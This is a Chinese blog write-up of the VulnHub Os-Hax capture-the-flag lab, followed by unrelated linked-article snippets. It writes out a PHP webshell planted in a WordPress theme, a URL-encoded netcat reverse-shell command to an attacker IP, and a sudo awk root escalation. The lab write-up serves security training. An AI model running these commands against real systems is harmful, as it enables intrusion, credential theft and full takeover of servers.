vulnhub靶机练习-Os-Hax,详细使用
发现靶机ip,使用nmap进行扫描
使用firefox 192.168.0.9进行访问。
可以查看页面的源代码,看看有没有什么有用信息。
使用目录扫描器gobuster扫描,发现一个wordpress目录。命令:gobuster dir -u http://192.168.0.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
访问成功,发现有一些标签并没有进行加载。需要让css样式进行加载
做一个hosts,把IP加入到localhost
访问成功,加载了样式。
发现这里有个用户,可以试着后台登录。
找到后台,尝试弱密码登录,无法登录。
看一下忘记密码,能不能获得验证的邮箱或者地址。
也无法获得邮箱和地址。
到这一步,再回到刚才的目录扫描,看看其他的目录文件。发现有一个img试着访问。
发现有一个图片是flag开头的,打开查看。
先把图片保存下来。
在本地使用工具查看里面的内容,发现一个好像passwd的密码,保存在文件夹中。
在使用其他工具查看一下信息。exiftool没有安装,使用apt-get install exiftool进行安装。
发现make当中同样存在passwd。
思考这个pass会是一个什么,重新使用账号进行登录,发现还是提示密码不对。
试试看会不会是目录文件,发现访问成功。有一个hostIP文件和一个flag文件。
发现是一个加密文件,把加密文件用百度进行查找
进行解密,获得账号密码,web:Hacker@4514 然后保存到文件夹中
使用账号密码进行登录,成功登录到了后台。
查看用户,发现我们是超级管理员,那就可以编写一个主题,拿webshell。
来到主题编写header这个主题,加入一句话木马。
更新一下,system($_REQUEST['knife']);
更新之后,来到主页,输入http://localhost/wordpress/?knife=id,成功使用
打开burp,放到reqeater,使用post传参,来使用反弹shell
监听本地的9001端口。nc -lvnp 9001
ctrl+u进行编码。使用反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.8+9001+>/tmp/f
反弹成功,做一个bashshell。
命令:python -c 'import pty;pty.spawn("/bin/bash")'
在文件当中,发现了一个config文件,进行查看,可以看见数据库账号和密码。
命令:cat /etc/passwd 查看密码文件
切换用户为web,之前获得的账号密码进行登录。
查看当前用户的权限,awk是可以调用系统函数的。可以进行执行root的命令
命令:sudo awk '{ system("/bin/bash")}' ,获得root权限。
进入root目录,查看文件,获得flag。
查看cat /etc/sudoers文件,发现web是nopasswd,可以使用awk。
这个版本也存在一个提权漏洞,也是另一种方法。uname -a
总结:
1.当发现后台进行爆破无法成功时,需要想一想目录的问题,会不会提示信息是在目录当中。
2.发现一些编码格式时,可以百度进行查看解密。
3.基本上拿到webshell之后所思考的提权都是有很多种的,根据情况不同,需要有不同的方法。
vulnhub靶机练习-Os-Hax,详细使用的更多相关文章
- vulnhub靶机-Me and My Girlfriend: 1
vulnhub靶机实战 1.靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.先看描述(要求) 通过这个我们可以知道我们 ...
- vulnhub靶机Os-hackNos-1
vulnhub靶机Os-hackNos-1 信息搜集 nmap -sP 192.168.114.0/24 找到开放机器192.168.114.140这台机器,再对这台靶机进行端口扫描. 这里对他的端口 ...
- vulnhub靶机练习-Os-hackNos-1,超详细使用
第一次写自己总结的文章,之后也会有更新,目前还在初学阶段. 首先介绍一下靶机,靶机是 vulnhub Os-hackNos-1 简介: 难度容易到中, flag 两个 一个是普通用户的user.txt ...
- Vulnhub 靶机 pwnlab_init 渗透——详细教程
1. 下载 pwnlab_ini 靶机的 .ova 文件并导入 VMware: pwnlab下载地址:PwnLab: init ~ VulnHub 导入VMware时遇到VMware上虚机太多,无法确 ...
- vulnhub靶机之DC6实战(wordpress+nmap提权)
0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...
- vulnhub靶机djinn:1渗透笔记
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali i ...
- 对vulnhub靶机lampiao的getshell到脏牛提权获取flag
前言: vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权. 靶机下载地址:https://mega.nz/#!aG4AAaDB!CBL ...
- PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT
猫宁~~~ 地址:https://www.vulnhub.com/entry/sunset-twilight,512/ 关注工具和思路. nmap 192.168.43.0/24靶机IP192.168 ...
- 脚本小子学习--vulnhub靶机DC8
@ 目录 前言 一.环境搭建 二.目标和思路 三.实际操作 1.信息收集 2.getshell 总结 前言 通过一些靶机实战练习,学习使用现有的工具来成为脚本小子. 一.环境搭建 靶机:Linux虚拟 ...
随机推荐
- 如何使用蓝湖设计稿同时适配PC及移动端
如何使用蓝湖设计稿同时适配PC及移动端 项目需求: 一套代码同时适配PC及移动端 方案: pc端采用px布局,移动端采用rem布局,通过媒体查询(media query)切换 坑: 尝试过使用post ...
- 为什么 StringBuffer 有 toStringCache 而 StringBuilder 没有?
对于 StringBuilder 和 StringBuffer 的源码会发现,StringBuffer 中有一个叫 toStringCache 的成员变量,用来缓存 toString() 方法返回字符 ...
- Java 使用线程池执行若干任务
在执行一系列带有IO操作(例如下载文件),且互不相关的异步任务时,采用多线程可以很极大的提高运行效率.线程池包含了一系列的线程,并且可以管理这些线程.例如:创建线程,销毁线程等.本文将介绍如何使用Ja ...
- 解决surfacebook无法运行64位虚拟机的问题
如果您嫌烦请直接看英文部分解决方案,另外windows专业版内置的hyper-v也是一款及其好用的虚拟机. 网上各种方案都尝试过,但是每次使用VMware创建64为虚拟机的时候总会显示不支持64位虚拟 ...
- Maven+Spring 框架,ModelAndView在页面取值不成功
如果创建的是maven project , maven生成的web.xml是这样的: 但是这样是不对的,应该修改成: 下面是代码: <?xml version="1.0" e ...
- iTerm2 实现 ssh 自动登录,并使用 Zmodem 实现快速传输文件
原文链接:https://fuckcloudnative.io/posts/iterm2-auto-login/ 对于 YAML 工程师来说,我们经常需要 ssh 登录不同的服务器,每次登录时都要经历 ...
- 【Spring】 Spring的核心容器
Spring的核心容器 文章目录 Spring的核心容器 BeanFactory ApplicationContext 1.通过ClassPathXmlApplicationContext创建 2.通 ...
- DHCP最佳实践(三)
这是Windows DHCP最佳实践和技巧的最终指南. 如果您有任何最佳做法或技巧,请在下面的评论中发布它们. 在本指南(三)中,我将分享以下DHCP最佳实践和技巧. 仅在需要时才使用IP冲突检测 运 ...
- ts类与修饰符
最近在用egret做游戏,就接触到了ts,刚开始的时候觉得类挺难的,毕竟大多数的JavaScript工程师工作中不怎么需要用到这个,但是学起来就不愿意撒手了,真香! typescript其实是es6的 ...
- 使用git同步代码
方法1.先把远程仓库clone到本地,本地修改后再push到gitee的远程仓库 1. 配置本地的git配置信息 git config -l #查看git本地配置信息 # 如果没有配置,需要配置自己的 ...